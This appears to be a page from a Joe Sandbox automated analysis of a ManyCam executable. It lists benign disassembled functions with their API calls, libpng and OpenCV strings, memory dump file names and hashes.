Opcode ID: 3f56ec2db3fc1ca85903a98619f27c2295566257b2a88fa86aed4e9f67b4d511
Instruction ID: 6456b4c038c8cb1d6d6f49463760314b90dea20f2aca757bc7e01c34bb30960b
Opcode Fuzzy Hash: 3f56ec2db3fc1ca85903a98619f27c2295566257b2a88fa86aed4e9f67b4d511
Instruction Fuzzy Hash: 65513C70005B5AD7EB106F10F61C3A6BBF4FB89790F010E9AE1E5551A9DFB1E4A9C702

Function 00BBCC40 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 159COMMON

Download Yara Rule

Strings

Missing IHDR before sRGB, xrefs: 00BBCC4E
Out of place sRGB chunk, xrefs: 00BBCC80
Incorrect sRGB chunk length, xrefs: 00BBCCC4
incorrect gamma=(%d/100000), xrefs: 00BBCD53
Ignoring incorrect cHRM value when sRGB is also present, xrefs: 00BBCE14
Unknown sRGB intent, xrefs: 00BBCD0C
Duplicate sRGB chunk, xrefs: 00BBCC9E
Invalid sRGB after IDAT, xrefs: 00BBCC5F
Ignoring incorrect gAMA value when sRGB is also present, xrefs: 00BBCD38

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID: Duplicate sRGB chunk$Ignoring incorrect cHRM value when sRGB is also present$Ignoring incorrect gAMA value when sRGB is also present$Incorrect sRGB chunk length$Invalid sRGB after IDAT$Missing IHDR before sRGB$Out of place sRGB chunk$Unknown sRGB intent$incorrect gamma=(%d/100000)
API String ID: 0-1854797742
Opcode ID: 15d62596973379f738e0b8c0f291941daaae913da8739d71c017c38a12be711d
Instruction ID: af90abe57d709b34c2ba3bdbe020a2d6d87fe2fbb4e17b999ed89d70ed677c9f
Opcode Fuzzy Hash: 15d62596973379f738e0b8c0f291941daaae913da8739d71c017c38a12be711d
Instruction Fuzzy Hash: C841E5716006456BE724E618DCC6EFB6BD4EF81B54F1408E9F548E2392C7D8FCA492B2

Function 005047C0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP80(00000000,7EC02BB4,?,?,?,00000000,00538D49,000000FF,?,0050405E,?), ref: 005047EA
??Bid@locale@std@@QAEIXZ.MSVCP80(?,?,?,00000000,00538D49,000000FF,?,0050405E), ref: 00504804
?_Getfacet@locale@std@@QBEPBVfacet@12@I@Z.MSVCP80(00538D49,?,?,?,00000000,00538D49,000000FF,?,0050405E), ref: 00504814
??1_Lockit@std@@QAE@XZ.MSVCP80(00585C98,00585C98), ref: 00504898

Strings

bad cast, xrefs: 00504844
^@P, xrefs: 00504811

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getfacet@locale@std@@Vfacet@12@
String ID: ^@P$bad cast
API String ID: 2261832285-3230263104
Opcode ID: 3b2a1131cef9067ba1ac1022581be8c82768a399d86bdfc45b63dcb7fc16c2e6
Instruction ID: 824bbbae0ea1dedba38b35fd60e665a14d2ea96d15b6e9388a122e9d75c37290
Opcode Fuzzy Hash: 3b2a1131cef9067ba1ac1022581be8c82768a399d86bdfc45b63dcb7fc16c2e6
Instruction Fuzzy Hash: 4631F9B4D04209DFDB08DFA5E845AAEBBB5FF58310F108A2AE922A33D0DB745905DF50

Function 00BBBD20 Relevance: 16.8, APIs: 2, Strings: 9, Instructions: 314COMMON

Download Yara Rule

APIs

sprintf.MSVCR80 ref: 00BBC017
sprintf.MSVCR80 ref: 00BBC0BD

Strings

Not enough memory to decompress chunk, xrefs: 00BBBF59
Buffer error in compressed datastream in %s chunk, xrefs: 00BBBFE6
Unknown zTXt compression type %d, xrefs: 00BBC0B7
Not enough memory to decompress chunk., xrefs: 00BBBDD5
Error decoding compressed text, xrefs: 00BBBF15, 00BBBFB0
Not enough memory for text., xrefs: 00BBC054
Data error in compressed datastream in %s chunk, xrefs: 00BBBFFE
Incomplete compressed datastream in %s chunk, xrefs: 00BBC011
Not enough memory to decompress chunk.., xrefs: 00BBBE5C

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: sprintf
String ID: Buffer error in compressed datastream in %s chunk$Data error in compressed datastream in %s chunk$Error decoding compressed text$Incomplete compressed datastream in %s chunk$Not enough memory for text.$Not enough memory to decompress chunk$Not enough memory to decompress chunk.$Not enough memory to decompress chunk..$Unknown zTXt compression type %d
API String ID: 590974362-1349257056
Opcode ID: c574cfb1be46fc766cd4d0dcad4e9aed8f2e66d88e2508abe8694121230a2c95
Instruction ID: 84dda99d968ca64c5466ddce437ac674e0f79c3ad76251876832a03256a1bf22
Opcode Fuzzy Hash: c574cfb1be46fc766cd4d0dcad4e9aed8f2e66d88e2508abe8694121230a2c95
Instruction Fuzzy Hash: 51B17B716042498FCB24DE68C881ABFB7EAEF84300F44456CFD8A97341DBF5A904CB92

Function 00B91AA0 Relevance: 16.7, APIs: 11, Instructions: 152windowCOMMON

Download Yara Rule

APIs

memset.MSVCR80 ref: 00B91AC2
IsWindow.USER32(?), ref: 00B91ACB
SendMessageA.USER32(?,0000042C,0000002C,?), ref: 00B91AE5
ICSendMessage.MSVFW32(?,0000400E,00000000,00000000), ref: 00B91B7D
ICClose.MSVFW32(?,?,0000400E,00000000,00000000), ref: 00B91B86
ICOpen.MSVFW32(43444956,?,00000002), ref: 00B91B97
ICSendMessage.MSVFW32(00000000,0000400C,?,?,43444956,?,00000002), ref: 00B91BB7
cvReleaseImage.CXCORE099(?,00000000,0000400C,?,?,43444956,?,00000002), ref: 00B91BC8
cvCreateImage.CXCORE099(?,?,00000008,00000003,?,00000000,0000400C,?,?,43444956,?,00000002), ref: 00B91BDB
ICDecompress.MSVFW32(?,00000000,?,?,00000008,?,?,?,00000008,00000003,?,00000000,0000400C,?,?,43444956), ref: 00B91C08
cvInitImageHeader.CXCORE099(?,?,?,00000008,00000003,00000001,00000004,?,?,?,?,00000000,0000400C,?,?,43444956), ref: 00B91C2F

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: ImageMessageSend$CloseCreateDecompressHeaderInitOpenReleaseWindowmemset
String ID:
API String ID: 2363853983-0
Opcode ID: 4d66b33db47b87435439d3d4777eebc809bc781824500107d53350743be99990
Instruction ID: f722e5ac73b2dc57269b18ff6922b45c49d643f4d65add79988010ee4ad1461b
Opcode Fuzzy Hash: 4d66b33db47b87435439d3d4777eebc809bc781824500107d53350743be99990
Instruction Fuzzy Hash: 40518E712443019BDB24EF18CC91F6B77E9EF94700F1448ADFA40AB282E771E845DB91

Function 004087B0 Relevance: 16.2, APIs: 7, Strings: 2, Instructions: 464memoryCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000004), ref: 004087E6

Part of subcall function 0040DA70: SetWindowPos.USER32(000001E2,-0000012B,000001E2,00000000,00000000,00000000,0040880B,?,?,0040880B,00000000,00000000,00000000,000001E2,-0000012B), ref: 0040DA95

Part of subcall function 004065F0: GetParent.USER32(?), ref: 004065FD

Part of subcall function 00406670: GetParent.USER32 ref: 0040669A
Part of subcall function 00406670: GetWindowRect.USER32(?,?), ref: 004066C0
Part of subcall function 00406670: GetWindowLongW.USER32(00000000,000000F0), ref: 004066DD
Part of subcall function 00406670: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0040670D

Part of subcall function 004CB5F0: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 004CB626
Part of subcall function 004CB5F0: _wmkdir.MSVCR80 ref: 004CB633

Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA

Part of subcall function 004164A0: FindFirstFileW.KERNEL32(00000000,00000104,000000D8,00000104,00000000), ref: 004164F5

MoveWindow.USER32(00000000,?,00000485,00000015,0000002D,00000052,00000017,00000000,00000117,000000C6,000000AF,00000017,00000001,00000000,?,0000048A), ref: 00408C6C
MoveWindow.USER32(00000000,?,0000048B,0000011C,00000104,00000058,00000017,00000000), ref: 00408CA4
MoveWindow.USER32(00000000,?,0000048C,0000017A,00000104,00000058,00000017,00000000), ref: 00408CDC
Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 00408D50
Concurrency::task_options::get_scheduler.LIBCPMTD ref: 00408DF3
_DebugHeapAllocator.LIBCPMTD ref: 00408E57

Strings

http://manycam.com/help/effects, xrefs: 00408A61
\ManyCam\TempBackgroundPreview, xrefs: 00408853

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Window$AllocatorDebugHeapMove$ParentSystem$Base::Concurrency::details::Concurrency::task_options::get_schedulerFileFindFirstFolderInfoLongMetricsParametersPathPolicyRectSchedulerSpecial_wmkdir
String ID: \ManyCam\TempBackgroundPreview$http://manycam.com/help/effects
API String ID: 802195438-2992585156
Opcode ID: ad0380625fa3cecf4b5e51684995b29088e82c278d6510ee7f53ab51bdbc22ca
Instruction ID: 373e2faf4f294b9354e902988eb878b0a96774ffebd8d1961b2fcec7c08dd6c9
Opcode Fuzzy Hash: ad0380625fa3cecf4b5e51684995b29088e82c278d6510ee7f53ab51bdbc22ca
Instruction Fuzzy Hash: 11121F70A041189BEB24EB55CD91BED7775AF44308F0044EEA20E7B2C2DE796E94CF69

Function 00BBDC20 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 187COMMON

Download Yara Rule

Strings

malformed width string in sCAL chunk, xrefs: 00BBDD12
Invalid sCAL after IDAT, xrefs: 00BBDC71
Out of memory while processing sCAL chunk, xrefs: 00BBDC57
Invalid sCAL data, xrefs: 00BBDDC6
Duplicate sCAL chunk, xrefs: 00BBDCA2
malformed height string in sCAL chunk, xrefs: 00BBDD55
Missing IHDR before sCAL, xrefs: 00BBDC32

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID: Duplicate sCAL chunk$Invalid sCAL after IDAT$Invalid sCAL data$Missing IHDR before sCAL$Out of memory while processing sCAL chunk$malformed height string in sCAL chunk$malformed width string in sCAL chunk
API String ID: 0-2190877121
Opcode ID: 3d58a6fef7a9dc5b87a20275046a122ccb8ce910b505f25955fc21deddd8c998
Instruction ID: 6e12b7665773636694042c42e2fab95c99dddf21b94081067c091a95d50a7524
Opcode Fuzzy Hash: 3d58a6fef7a9dc5b87a20275046a122ccb8ce910b505f25955fc21deddd8c998
Instruction Fuzzy Hash: C2414E756002042BD700BB04ACC1EFB77D8EFC6B65F8405D9F98852253E7EE991A92B2

Function 00BBC470 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 130COMMON

Download Yara Rule

APIs

fprintf.MSVCR80 ref: 00BBC58D

Strings

Ignoring gAMA chunk with gamma=0, xrefs: 00BBC548
Out of place gAMA chunk, xrefs: 00BBC4B0
Missing IHDR before gAMA, xrefs: 00BBC47E
Duplicate gAMA chunk, xrefs: 00BBC4D2
gamma = (%d/100000), xrefs: 00BBC587
Incorrect gAMA chunk length, xrefs: 00BBC4F8
Invalid gAMA after IDAT, xrefs: 00BBC48F
Ignoring incorrect gAMA value when sRGB is also present, xrefs: 00BBC572

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: fprintf
String ID: Duplicate gAMA chunk$Ignoring gAMA chunk with gamma=0$Ignoring incorrect gAMA value when sRGB is also present$Incorrect gAMA chunk length$Invalid gAMA after IDAT$Missing IHDR before gAMA$Out of place gAMA chunk$gamma = (%d/100000)
API String ID: 383729395-996772653
Opcode ID: 2f12f70489f75b95bc38666ccd36350b3e3dc8a5b1a9aabae1c178908b6d4e32
Instruction ID: 5d2d4baf0e1025db1494f64e1d4d0d1b60b3c1703b779e9f63a496171b286cdf
Opcode Fuzzy Hash: 2f12f70489f75b95bc38666ccd36350b3e3dc8a5b1a9aabae1c178908b6d4e32
Instruction Fuzzy Hash: E23157B27006042BD610FA19EC92EFF7BD8EFD1755F0804E9F588A2253DBD49A0182E6

Function 00B95370 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 116COMMON

Download Yara Rule

APIs

cvError.CXCORE099(000000E5,cvResizeWindow,NULL name,.\window_w32.cpp,000002A9), ref: 00B95392
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B9540A
GetClientRect.USER32(?,?), ref: 00B95415
GetWindowRect.USER32(?,?), ref: 00B95424
MoveWindow.USER32(?,00000001,?,?,?,00000001,?,?,?,?,00000000), ref: 00B95460
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00B954A2

Strings

.\window_w32.cpp, xrefs: 00B95381
NULL name, xrefs: 00B95386
cvResizeWindow, xrefs: 00B9538B

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Window$Move$Rect$ClientError
String ID: .\window_w32.cpp$NULL name$cvResizeWindow
API String ID: 3901070998-2204944233
Opcode ID: bacbd2835c980b100319c26609096e08bb296ad4098642e6969e94b8079c553f
Instruction ID: 325be935fdbd6aa692cd579f16625d861016bd2c3417570e5b2a8840696cba5a
Opcode Fuzzy Hash: bacbd2835c980b100319c26609096e08bb296ad4098642e6969e94b8079c553f
Instruction Fuzzy Hash: 20317975214301AFCB18DF28CC95D2BB7E9FBC8714F098A5CF98A97254E670E8018B91

Function 0050E050 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 116memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 0050E09D
_DebugHeapAllocator.LIBCPMTD ref: 0050E0C5

Part of subcall function 0050E4A0: _DebugHeapAllocator.LIBCPMTD ref: 0050E4E3
Part of subcall function 0050E4A0: _DebugHeapAllocator.LIBCPMTD ref: 0050E4FF

??0CxImage@@QAE@PAEKK@Z.CXIMAGECRT(&<Q,?,00000000,?,?,?,&<Q), ref: 0050E12E
?Encode2RGBA@CxImage@@QAE_NAAPAEAAJ_N@Z.CXIMAGECRT(00000000,00000000,00000000,&<Q,?,00000000,?,?,?,&<Q), ref: 0050E155
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,&<Q,?,00000000,?,?,?,&<Q), ref: 0050E160
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,&<Q,?,00000000,?,?,?,&<Q), ref: 0050E16C
??3@YAXPAX@Z.MSVCR80(?,00000000,?,?,00000008,00000004,00000000,00000004,00000000,00000000,00000000,00000000,00000000,&<Q,?,00000000), ref: 0050E1B7
~_Mpunct.LIBCPMTD ref: 0050E1D3

Strings

&<Q, xrefs: 0050E08C, 0050E124, 0050E1A7, 0050E08F, 0050E090, 0050E127

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeapImage@@$??3@Encode2Height@MpunctWidth@
String ID: &<Q
API String ID: 2867035028-2887711709
Opcode ID: fbbaa05d77a0a2c3aee7ba4de5523e50d8f2c9dc1e9e8a6a3e8fff9c4fd9968c
Instruction ID: 4fa1d1e2ea6a526748637154a1db03ed3227427cf2602f353b57d12039db24cc
Opcode Fuzzy Hash: fbbaa05d77a0a2c3aee7ba4de5523e50d8f2c9dc1e9e8a6a3e8fff9c4fd9968c
Instruction Fuzzy Hash: 175137B1D00259AFDB14EF54CC46BEEBBB8AF54304F1082ADE519A7281DB746B84CF90

Function 00504470 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP80(00000000,7EC02BB4,?,00538D19,000000FF,?,005028F6,?,?,00000000,00000001), ref: 0050449A
??Bid@locale@std@@QAEIXZ.MSVCP80(?,005028F6,?,?,00000000), ref: 005044B4
?_Getfacet@locale@std@@QBEPBVfacet@12@I@Z.MSVCP80(005028F6,?,005028F6,?,?,00000000), ref: 005044C4
??1_Lockit@std@@QAE@XZ.MSVCP80(00585C98,00585C98), ref: 00504548

Strings

bad cast, xrefs: 005044F4

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getfacet@locale@std@@Vfacet@12@
String ID: bad cast
API String ID: 2261832285-3145022300
Opcode ID: 923687adefb6f0c19f08b85b92506c3169178af31264b40b8c27a0d15710eb83
Instruction ID: daf008f5657916d2d0eedf94b6e793cb89aacae9b3ddac5973414a6306a2ac1a
Opcode Fuzzy Hash: 923687adefb6f0c19f08b85b92506c3169178af31264b40b8c27a0d15710eb83
Instruction Fuzzy Hash: CE31F7B5D04209DFDB18DFA4EC45AAEBBB4FB58310F10862AE922A33D0DB745945DF50

Function 00B96810 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 51registrywindowCOMMON

Download Yara Rule

APIs

LoadIconA.USER32 ref: 00B9685D
LoadCursorA.USER32(00000000,00007F03), ref: 00B9686D
GetStockObject.GDI32(00000002), ref: 00B9687F
RegisterClassA.USER32(?), ref: 00B96890
GetStockObject.GDI32(00000002), ref: 00B968A1
RegisterClassA.USER32(?), ref: 00B968B4

Part of subcall function 00BDBDA9: __onexit.MSVCRT ref: 00BDBDAD

Strings

#, xrefs: 00B9683D
Main HighGUI class, xrefs: 00B96892
HighGUI class, xrefs: 00B9682C

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: ClassLoadObjectRegisterStock$CursorIcon__onexit
String ID: #$HighGUI class$Main HighGUI class
API String ID: 1477171359-2338146754
Opcode ID: 1dcc0684175f16a4743a60ba82c4ef0c2cf243225e40fbc357ceaf89d5e64d49
Instruction ID: c28e802bf3dd6dd4d86efbaba184166e4b4f6d0d929e8c287c467e14abe1a2ea
Opcode Fuzzy Hash: 1dcc0684175f16a4743a60ba82c4ef0c2cf243225e40fbc357ceaf89d5e64d49
Instruction Fuzzy Hash: 2E1116B28193119FC740DF69D888A0AFBE4FB88B04F00096FF48897261E7B495498F86

Function 00402680 Relevance: 15.4, APIs: 10, Instructions: 409COMMON

Download Yara Rule

APIs

cvSet.CXCORE099(?,?,?,?,?,?,00000000), ref: 004026F7
cvGEMM.CXCORE099(?,?), ref: 00402755
_CIsqrt.MSVCR80 ref: 004027F6
cvGEMM.CXCORE099(?,?), ref: 00402852
cvSet2D.CXCORE099(?,?,?), ref: 004028DB
cvGEMM.CXCORE099(?,?,?,00000000,?,00000000), ref: 00402925
cvSet2D.CXCORE099(?,?,?), ref: 0040299E
cvGEMM.CXCORE099(?,?,?,00000000,?,00000000), ref: 00402A4D
cvGEMM.CXCORE099(?,?), ref: 00402ADA
cvLine.CXCORE099(?,?,?,?,?), ref: 00402B4D

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Set2$IsqrtLine
String ID:
API String ID: 2296038289-0
